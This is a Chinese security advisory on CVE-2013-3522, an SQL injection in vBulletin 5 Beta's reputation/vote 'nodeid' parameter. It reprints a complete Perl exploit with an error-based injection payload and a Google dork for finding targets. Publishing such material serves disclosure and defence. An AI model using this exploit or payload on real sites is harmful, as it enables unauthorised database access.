首页 -> 安全研究

安全研究

安全漏洞
vBulletin index.php/ajax/api/reputation/vote nodeid参数SQL注入漏洞

发布日期:2013-12-10
更新日期:2013-12-12

受影响系统:
VBulletin VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28
描述:
CVE(CAN) ID: CVE-2013-3522

VBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。

vBulletin的index.php/ajax/api/reputation/vote脚本没有正确过滤 'nodeid' 参数值,这可使攻击者在后端数据库中注入或操作SQL查询。

<*来源:Orestis Kourides
  
  链接:http://www.osvdb.org/92031
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin&#153; Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
  
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
  
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;

建议:
厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vbulletin.com/

浏览次数:3861
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障